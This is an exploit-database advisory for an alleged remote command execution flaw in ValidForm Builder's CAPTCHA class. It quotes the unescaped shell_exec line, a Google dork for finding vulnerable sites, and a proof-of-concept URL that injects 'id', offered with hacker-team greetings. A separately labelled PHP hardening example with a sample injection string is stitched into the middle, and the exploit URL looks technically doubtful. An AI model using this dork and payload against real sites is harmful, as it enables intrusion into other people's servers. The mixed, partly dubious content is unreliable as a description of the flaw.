ValidForm Builder script - Remote Command Execution

EDB-ID: 14454
CVE: N/A
Platform: PHP
Date: 2010-07-23

# Exploit Title:   ValidForm Builder script Remote Command Execution Vulnerability
# Date: 2010/07/23
# Author: HackeR aRaR
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script: http://validformbuilder.googlecode.com/files/validformbuilder_v.1.0.zip
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
#ViRuS Qalaa:em9@live.com
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
shell_exec("$this->sFlitePath -t \"$sText\" -o $this->sAudioPath$sFile.wav");
/libraries/ValidForm/class.phpcaptcha.php
Line:466
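
A hardened form of the call quoted above, as an added example that is not part of the original advisory or of ValidForm Builder's own code. The helper name `build_flite_command`, the allowed-character patterns and the sample paths are assumptions made for illustration.

```php
<?php
// Added example, not ValidForm Builder code. build_flite_command() is a
// hypothetical helper; the patterns and sample paths below are assumptions.

/**
 * Build the flite command line with every variable part validated and
 * escaped, instead of interpolating raw values into one shell string.
 */
function build_flite_command(string $flitePath, string $text, string $audioDir, string $file): string
{
    // The output file name is generated server-side, so accept only a
    // strict pattern (no path separators, dots or shell metacharacters).
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $file)) {
        throw new InvalidArgumentException('unexpected audio file name');
    }
    // Text to be spoken for an audio CAPTCHA: short, alphanumeric, spaces allowed.
    if (!preg_match('/\A[A-Za-z0-9 ]{1,32}\z/', $text)) {
        throw new InvalidArgumentException('unexpected captcha text');
    }

    $out = rtrim($audioDir, '/\\') . DIRECTORY_SEPARATOR . $file . '.wav';

    // escapeshellarg() quotes each value so the shell sees exactly one
    // argument per value, whatever characters it contains.
    return escapeshellarg($flitePath)
        . ' -t ' . escapeshellarg($text)
        . ' -o ' . escapeshellarg($out);
}

// Constructed sample values: a normal request.
echo build_flite_command('/usr/bin/flite', 'a b c 1 2', '/var/tmp/captcha', 'f3a9'), PHP_EOL;

// Constructed sample values: text containing a quote and a semicolon is
// rejected by the allow-list before any command string is built.
try {
    build_flite_command('/usr/bin/flite', 'x"; id; "', '/var/tmp/captcha', 'f3a9');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The returned string is what would be handed to `shell_exec()`; the allow-list check and the escaping are independent layers, so either one alone still stops a value from breaking out of its argument.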

----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"

http://{localhost}/{path}/libraries/ValidForm/class.phpcaptcha.php?this=id

---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0

and My friends Others and My friends in MSN
EnJoY o_O